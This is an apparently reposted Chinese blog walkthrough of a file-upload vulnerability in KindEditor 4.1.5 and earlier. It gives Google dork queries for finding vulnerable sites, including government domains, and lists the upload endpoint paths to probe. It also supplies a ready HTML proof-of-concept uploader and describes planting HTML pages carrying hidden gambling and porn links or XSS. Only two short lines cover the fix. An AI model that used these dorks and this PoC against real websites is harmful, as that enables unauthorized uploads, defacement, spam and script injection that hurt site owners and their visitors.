1. 全栈程序员必看首页

kindeditor<=4.1.5上传漏洞复现

全栈程序员-站长 未分类 阅读 23

kindeditor<=4.1.5上传漏洞复现0x00漏洞描述漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中这里

大家好,又见面了,我是你们的朋友全栈君。

0x00 漏洞描述

漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中

这里html里面可以嵌套暗链接地址以及嵌套xss。Kindeditor上的uploadbutton.html用于文件上传功能页面,直接POST到/upload_json.*?dir=file,在允许上传的文件扩展名中包含htm,txt:extTable.Add(“file”,”doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2″)

 

0x01 批量搜索

在google中批量搜索:

inurl:/examples/uploadbutton.html

inurl:/php/upload_json.php

inurl:/asp.net/upload_json.ashx

inurl://jsp/upload_json.jsp

inurl://asp/upload_json.asp

inurl:gov.cn/kindeditor/

 

 

0x02 漏洞问题

根本脚本语言自定义不同的上传地址,上传之前有必要验证文件 upload_json.* 的存在

/asp/upload_json.asp

/asp.net/upload_json.ashx

/jsp/upload_json.jsp

/php/upload_json.php

可目录变量查看是否存在那种脚本上传漏洞:

kindeditor/asp/upload_json.asp?dir=file

kindeditor/asp.net/upload_json.ashx?dir=file

kindeditor/jsp/upload_json.jsp?dir=file

kindeditor/php/upload_json.php?dir=file

0x03  漏洞利用

google搜素一些存在的站点 inurl:kindeditor

1.查看版本信息

http://www.xxx.org/kindeditor//kindeditor.js

<span role="heading" aria-level="2">kindeditor<=4.1.5上传漏洞复现
 

2.版本是4.1.10可以进行尝试如下路径是否存在有必要验证文件 upload_json.* 

kindeditor/asp/upload_json.asp?dir=file

kindeditor/asp.net/upload_json.ashx?dir=file

kindeditor/jsp/upload_json.jsp?dir=file

kindeditor/php/upload_json.php?dir=file

3.如下图可以看出是存在jsp上传点:

http://www.xxx.org/kindeditor/jsp/upload_json.jsp?dir=file

<span role="heading" aria-level="2">kindeditor<=4.1.5上传漏洞复现
 
 

4.写出下面的构造上传poc,这里需要修改<script>…<script>以及url : 的内容,根据实际情况修改.

<html><head>

 

<title>Uploader</title>

 

<script src="http://www.xxx.org/kindeditor//kindeditor.js"></script>

 

<script>

 

KindEditor.ready(function(K) {

 

var uploadbutton = K.uploadbutton({

 

button : K('#uploadButton')[0],

 

fieldName : 'imgFile',

 

url : 'http://www.xxx.org/kindeditor/jsp/upload_json.jsp?dir=file',

 

afterUpload : function(data) {

 

if (data.error === 0) {

 

var url = K.formatUrl(data.url, 'absolute');

 

K('#url').val(url);}

 

},

 

});

 

uploadbutton.fileBox.change(function(e) {

 

uploadbutton.submit();

 

});

 

});

 

</script></head><body>

 

<div class="upload">

 

<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />

 

<input type="button" id="uploadButton" value="Upload" />

 

</div>

 

</body>

 

</html>

 

5.用浏览器打开,然后开启bupsuit进行拦截发送,可以看到成功上传txt文件

<span role="heading" aria-level="2">kindeditor<=4.1.5上传漏洞复现
 
<span role="heading" aria-level="2">kindeditor<=4.1.5上传漏洞复现
 
 
 
<span role="heading" aria-level="2">kindeditor<=4.1.5上传漏洞复现

 

6.同时也可以上传.html文件,这里就是攻击者最喜欢上传的文件(里面包含了各种暗页连接地址,如菠菜和其他色情站点链接地址)
 
<span role="heading" aria-level="2">kindeditor<=4.1.5上传漏洞复现
 
 
<span role="heading" aria-level="2">kindeditor<=4.1.5上传漏洞复现
 

0x04 漏洞修复

1.直接删除upload_json.*和file_manager_json.*
2.升级kindeditor到最新版本
 

 

 

 

 

 

 

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/154990.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • ASP.NET和MSSQL高性能分页

    ASP.NET和MSSQL高性能分页

    首先是存储过程,只取出我需要的那段数据,如果页数超过数据总数,自动返回最后一页的纪录:setANSI_NULLSONsetQUOTED_IDENTIFIERONGO–===========

    全栈程序员-站长的头像 全栈程序员-站长
    2021年12月20日
    42
  • CurrentHashMap的实现原理

    CurrentHashMap的实现原理

    CurrentHashMap的实现原理hash表介绍哈希表就是一种以键-值(key-indexed)存储数据的结构,我们只要输入待查找的值即key,即可查找到其对应的值。哈希的思路很简单,如果所有的键都是整数,那么就可以使用一个简单的无序数组来实现:将键作为索引,值即为其对应的值,这样就可以快速访问任意键的值。这是对于简单的键的情况,我们将其扩展到可以处理更加复杂的类型的键。链式hash表链式哈希表从根本上说是由一组链表…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月18日
    19
  • 企业微信如何制定社群sop

    企业微信如何制定社群sop

    企业微信如何制定社群sop什么是社群运营SOP?即标准作业程序。而社群运营SOP指的是社群运营工作的标准化,从拉新、促活到社群留存转化,都有一套标准的操作流程。社群运营工作有很多共性。企业制定社群运营SOP,将会大大提高工作效率,节省时间和人力成本。现在,越来越多企业通过企业微信进行社群运营。那么企业微信社群运营SOP应该如何制定呢?企业微信如何制定社群运营SOP?对于企业微信社群运营来说,做到定时定量,从而培养用户习惯是非常重要的。企业微信可以帮助企业员工进行客户群发、客户群群发,减少运营人员的工作量,用户一天仅可

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月26日
    38
  • 达芬奇的密码[通俗易懂]

    达芬奇的密码[通俗易懂]

    达芬奇的密码[通俗易懂]写在前面郇山隐修会是一个确实存在的组织,是一个成立于1099年的欧洲秘密社团。1975年巴黎国家图书馆发现了被称作“秘密卷宗”的羊皮纸文献,才知道包括艾撒克。牛顿爵士、波提切利、维克多。雨果和列昂纳多。达。芬奇等众多人物均为郇山隐修会成员。人们所知的“天主事工会”是一个梵蒂冈教派——一个极度虔诚的罗马天主教派。该教派近来引起了诸多争议,因为有报道

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月11日
    27
  • Java中super()的使用[通俗易懂]

    Java中super()的使用[通俗易懂]

    Java中super()的使用[通俗易懂]目录1.super()的使用实例一一一子类重写父类的方法2.super()的使用实例一一一子类重写父类的变量3.super()的使用实例一一一在子类的构造方法中4.关于构造方法中super()第一种情况:编译不通过第二种情况:编译不通过第三种情况:成功编译通过1.super()的使用实例一一一子类重写父类的方法publicclassA{…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月11日
    30
  • 免费且超级好用的搜索引擎INSO[通俗易懂]

    免费且超级好用的搜索引擎INSO[通俗易懂]

    免费且超级好用的搜索引擎INSO[通俗易懂]免费且超级好用的搜索引擎INSO已经上线啦,界面UI是采用FlatUI设计,能够搜索到很多很多资源,近期资源一般来说要等10天左右,否则基本上是枪版。后面我会推出开发这个搜索引擎的系列教程的,尽请期待!网址是http://www.inso.hk

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月18日
    28

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号